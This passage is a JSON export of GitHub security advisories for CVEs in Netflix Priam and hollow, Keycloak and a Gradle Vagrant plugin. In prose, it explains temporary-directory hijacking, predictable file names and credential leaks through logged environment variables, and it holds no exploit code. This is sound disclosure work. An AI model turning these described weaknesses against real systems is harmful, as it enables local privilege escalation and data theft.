"updated_at": "2021-03-30T14:57:18Z", "published_at": "2021-03-30T14:57:18Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "", "name": "Netflix/Priam" }, "vulnerable_version_range": "All", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "score": 6.2 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-j83w-7qr9-wv86", "cve_id": "CVE-2021-28099", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-j83w-7qr9-wv86", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-j83w-7qr9-wv86", "summary": "Netflix/hollow: Temporary directory hijacking", "description": "### Impact\r\nTemporary directory hijacking.\r\n\r\nThis vulnerability exists because Netflix/hollow will use files/directories that already exist on the system without first checking their permissions.\r\n\r\nThis vulnerability can be seen 
here:\r\nhttps://github.com/Netflix/hollow/blob/eeefe2454ed2efce60b8971e1a02d8f7375ea7fb/hollow/src/main/java/com/netflix/hollow/api/producer/fs/HollowFilesystemBlobStager.java#L112-L140\r\n\r\nSince the Files.exists(parent) is run before creating the directories, an attacker can pre-create these directories with wide permissions.\r\n\r\nAdditionally, since an insecure source of randomness is used, the file names to be created can be deterministically calculated.\r\n\r\nhttps://github.com/Netflix/hollow/blob/eeefe2454ed2efce60b8971e1a02d8f7375ea7fb/hollow/src/main/java/com/netflix/hollow/api/producer/fs/HollowFilesystemBlobStager.java#L110\r\n\r\nAs such, an attacker is fully able to control both the contents of the files and directories that HollowFilesystemBlobStager operates on.\r\n\r\n---\r\n\r\nThe custom CodeQL queries leveraged to find these, as well as their results, can be found here:\r\n\r\nhttps://lgtm.com/query/1543383251073929777/\r\nhttps://lgtm.com/query/3142895023158674709/\r\n\r\n## Official Disclosure\r\n\r\nhttps://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-001.md\r\n\r\n## Fixed Version\r\n\r\nThis vulnerability has not been patched.\r\n", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": 
"https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-j83w-7qr9-wv86", "type": "GHSA" }, { "value": "CVE-2021-28099", "type": "CVE" } ], "state": "published", "created_at": "2021-03-22T23:34:10Z", "updated_at": "2021-03-30T14:52:37Z", "published_at": "2021-03-30T14:52:37Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "com.netflix.hollow:hollow" }, "vulnerable_version_range": "All", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "score": 7.8 }, "cwes": [], "cwe_ids": [], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 
1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-7gf3-89f6-823j", "cve_id": "CVE-2021-20202", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-7gf3-89f6-823j", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-7gf3-89f6-823j", "summary": "Keycloak: Local Temporary Directory Hijacking Vulnerability", "description": "Utilizing a custom CodeQL query written as a part of the GitHub Security Lab Bug Bounty program, I've unearthed a local temporary directory hijacking vulnerability.\r\n\r\nThis particular vulnerability impacts Keycloak/keycloak\r\n\r\nYou can see the custom CodeQL query utilized here:\r\nhttps://lgtm.com/query/7674880310425951666/\r\n\r\nThis particular vulnerability exists because on unix-like systems (not including MacOS) the system temporary directory is shared between all users.\r\nAs such, failure to correctly set file permissions and/or verify exclusive creation of directories can lead to either local information disclosure, 
or local file hijacking by another user.\r\n\r\nIn the worst case scenario, this can lead to a local privilege escalation vulnerability, as it did in this vulnerability I disclosed in Jetty:\r\nhttps://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6\r\n\r\nIn this case, it does not look like code is explicitly intended to be written to these directories. However, it does look like the GzipResourceEncodingProviderFactory.java is used as the creator of a cache. Thus, a malicious user can perform cache poisoning.\r\n\r\nAdditionally, DirExportProvider.java looks like it's being used to export information. This information can be corrupted by a different user.\r\n\r\nOne of many root causes here is that `mkdir` and `mkdirs` do not fail if the directory already exists. They merely return `false`. As such, an attacker can create these directories before the java process creates them, but with wider user permissions. Since these directory names are not in any way random, the attacker can simply create these directories ahead of Keycloak. 
When this happens, the java process doesn't complain that the directories already exist, `mkdir` and `mkdirs` simply return false.\r\n\r\nHowever, assuming that the java process is the first thing to create these directories, `mkdir` and `mkdirs` will only set the directory following the default umask (I believe); by default that means that these directories are created with the permissions `drwxr-xr-x`.\r\nThus allowing a malicious local user to read the contents of this temporary directory.\r\n\r\n## Official Disclosure\r\n\r\nhttps://access.redhat.com/security/cve/cve-2021-20202\r\n\r\n## Official Fix\r\nhttps://github.com/keycloak/keycloak/pull/7859/files", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": 
"https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-7gf3-89f6-823j", "type": "GHSA" }, { "value": "CVE-2021-20202", "type": "CVE" } ], "state": "published", "created_at": "2021-03-16T14:47:16Z", "updated_at": "2021-12-22T20:26:37Z", "published_at": "2021-12-22T20:26:37Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "org.keycloak:keycloak-services" }, "vulnerable_version_range": "12.0.0 < 13.0.0", "patched_versions": "13.0.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "score": 6.3 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": 
"https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-jpcm-4485-69p7", "cve_id": "CVE-2021-21361", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-jpcm-4485-69p7", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-jpcm-4485-69p7", "summary": "Sensitive information disclosure via log in com.bmuschko:gradle-vagrant-plugin", "description": "### Impact\r\n\r\nThe `com.bmuschko:gradle-vagrant-plugin` Gradle plugin contains an information disclosure vulnerability due to the logging of the system environment variables.\r\n\r\nWhen this Gradle plugin is executed in public CI/CD, this can lead to sensitive credentials being exposed to malicious actors.\r\n\r\n### Patches\r\nFixed in version 3.0.0\r\n\r\n### References\r\n\r\n - https://github.com/bmuschko/gradle-vagrant-plugin/blob/292129f9343d00d391543fae06239e9b0f33db73/src/main/groovy/com/bmuschko/gradle/vagrant/process/GDKExternalProcessExecutor.groovy#L42-L44\r\n - https://github.com/bmuschko/gradle-vagrant-plugin/issues/19\r\n - https://github.com/bmuschko/gradle-vagrant-plugin/pull/20\r\n\r\n### For more information\r\n\r\nIf you have any questions or comments about this advisory:\r\n* Open an issue in [bmuschko/gradle-vagrant-plugin](https://github.com/bmuschko/gradle-vagrant-plugin)\r\n\r\n", "severity": "high", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": 
"MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-jpcm-4485-69p7", "type": "GHSA" }, { 
"value": "CVE-2021-21361", "type": "CVE" } ], "state": "published", "created_at": "2021-03-01T14:48:05Z", "updated_at": "2021-03-12T16:10:55Z", "published_at": "2021-03-08T17:44:33Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "com.bmuschko:gradle-vagrant-plugin" }, "vulnerable_version_range": "0.6<,  < 3.0.0", "patched_versions": "3.0.0", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "score": 7.4 }, "cwes": [ { "cwe_id": "CWE-532", "name": "Insertion of Sensitive Information into Log File" }, { "cwe_id": "CWE-779", "name": "Logging of Excessive Data" } ], "cwe_ids": [ "CWE-532", "CWE-779" ], "credits": [ { "login": "britter", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "britter", "id": 1327662, "node_id": "MDQ6VXNlcjEzMjc2NjI=", "avatar_url": "https://avatars.githubusercontent.com/u/1327662?v=4", "gravatar_id": "", "url": "https://api.github.com/users/britter", "html_url": "https://github.com/britter", "followers_url": "https://api.github.com/users/britter/followers", "following_url": "https://api.github.com/users/britter/following{/other_user}", "gists_url": "https://api.github.com/users/britter/gists{/gist_id}", "starred_url": "https://api.github.com/users/britter/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/britter/subscriptions", "organizations_url": "https://api.github.com/users/britter/orgs", "repos_url": "https://api.github.com/users/britter/repos", "events_url": "https://api.github.com/users/britter/events{/privacy}", "received_events_url": "https://api.github.com/users/britter/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] } ]